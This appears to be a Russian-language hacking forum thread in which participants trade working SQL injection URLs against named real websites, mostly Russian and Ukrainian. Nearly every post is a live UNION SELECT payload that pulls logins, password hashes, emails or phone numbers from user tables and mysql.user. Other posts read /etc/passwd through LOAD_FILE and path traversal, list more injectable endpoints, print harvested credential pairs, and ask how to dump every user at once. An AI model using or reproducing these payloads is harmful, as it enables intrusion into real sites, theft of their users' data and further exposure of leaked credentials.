http://drive-tv.ru/site/index.php?sys_page=main&sys_link=2&sys_blok=2&news_id=-1637%20union%20select%201,2,3,4%20from%20mysql.user/*
http://galagraphics.kz/image_produce.php?id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(concat(subscriberId,char(58),subscriber,char(58),code),0x71),0x71),5,6+from+post_subscribers/* http://www.tesclub.ru/guide/country.html?id=-3 http://www.2gis.ru/about/news/id=18' вот ещё парочка
http://www.atk-studio.ru/relations/forum/index.php?type=forum&showUser&user_id=6%20union%20select%201,nick,3,4,password,email,7,8%20from%20users/* http://news.samaratoday.ru/showNews.php?id=-105950%20union%20select%201,2,3,null,5,username,email,phone,9,0,11,22,33,44,55%20from%20users/*
AutoTeatr.ru Code: http://www.autoteatr.ru/catalog.php?id=-111+union+select+1,user(),3,4,version(),database(),7,8,9,10,11,12,13/* Airis.ru Code: http://www.airis.ru/dpage.php?pgname=catalog.php&qt=good&ID=1+union+select+1,2,3,4,user(),version(),7,8,9,10,11,12,13,current_date(),15,16,database(),18/* Kbor.ru Code: http://www.kbor.ru/catalog.php?id=11111111+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user(),15,16,17,18,19,database(),21,22,23,24,25,26,27,28,version(),30,current_date(),32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51/* konkord.dp.ua Code: http://konkord.dp.ua/catalog.php?id=1111+union+select+1,user(),version(),4,5,6,7/*
_http://www.artisticsavants.com/member_art.php?member_id=18+union+select+1,2,3,4,concat(email,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+TblMember/* http://zaz.kiev.ua/get.php?type=page&src=../../../../../etc/passwd как машину назовут, так она и поедет...про сайт аналогично
http://www.webismedia.ru/web.php?s=-99'+union+select+1,2,3,4,'hmm',6,7,8,9,10,11,12/* таблицу с юзерами пока что не подобрал =\
http://www.samtelecom.ru/index.php?showfile=1&fid=22&p=downloads&area=1&categ=999+union+select+1,user(),3/* 4ё-то таблицы пока что не подобрал =\ позже мб
2ice1k Держи http://www.webismedia.ru/web.php?s=-99'+union+select+1,2,3,4,5,6,7,concat(login,0x3a,password),9,10,11,12+from+webismedia_users/*
Много же они о себе возомнили =) http://www.itstar.ru/template.php?dept_id=-99+union+select+1,2,3,0x707265766564,5,6,7,8,9,10,11,12,13,14/* Дальше даже юзать не стал пытаться... Аж как-то "стыдно" за таких "отечественных разработчиков" =\ А ведь ещё столького о себе понапишут... ADD: http://master-site.com/docs/portfolio/index.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12/* ADD: http://webmanager-pro.com/index.php?lang_id=1&content_id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user()/* интересная sql'я сначала даже не понял, где инфа выводится мда
Code: http://www.uralweb.ru/catalog/card.php?id=-99'+union+select+1,2,concat(convert(user+using+cp1251),0x3a,convert(password+using+cp1251)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+mysql.user+limit+0,1/* Code: http://www.uralweb.ru/catalog/card.php?id=-99'+union+select+1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/* etc... =\
не ждали, а мы наскулили /*****************************/ Code: http://www.golodomor.org.ua/speech.php?id=-1+union+select+1,user,pass+from+users/* admin:260729 /******************************/ Code: http://studybank.info/viewdetails.php?id=-1+union+select+1,2,3,4,5,6,7,passwd,9,10,11,12,username,14+from+user/* avdinform:123slay /******************************/ Code: http://tema.in.ua/article/?id=-1+union+select+1,2,3,4,5,7,8,9,10,11,12,13,14,15,16,17,18,19/* /******************************/ Code: http://www.fri.net.ua/loadnews.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*8&page=1 /******************************/ Code: http://www.kiis.com.ua/index.php?id=-1+union+select+1,2,3,4,user(),6,7,9,8/*&sp=1 /******************************/ Code: http://www.iom.org.ua/index.php?id=-1+union+select+1,2,3,4,5,6+from+users/*&sub_id=103&action=content&wlng=u /******************************/ Code: http://www.golosiyiv.kiev.ua/art?id=-1+union+select+1,2,password,4,5,6,7,8,9,10,11+from+users/* /******************************/ Code: http://www.techinvest.com.ua/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*&lang=ua&type=com&act=single
Сибирь-Телеком _http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+1,2/* с названием таблиц беда(
_http://inform.com.ua/index.php?s=52' _http://www.buhgalteria.com.ua/Answer.html?id=2869' _http://www.ukraina.net.pl/index.php?art=pokaz&num=1241' _http://www.promsvyaz.kiev.ua/index.php?menu_word=4&command=more&id_news=42&lang=1' _http://www.video.lg.ua/search.html?beg=' _http://www.el-drive.com.ua/forum/Profile.php?UsId='
http://www.beatles.ru/postman/club_birthday.asp?m=2&d=1+or+1=(SELECT+TOP+1+cast(user_name+as+nvarchar)%2B%27%3A%27%2Bcast(user_email+as+nvarchar)%2B%27%3A%27%2Bcast(user_Password+as+nvarchar)+from+users%20where%20user_id=58)-- А есть какой-нибудь способ вывести инфу со всех пользователей сразу?
Почему беда? http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+table_name,2+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*
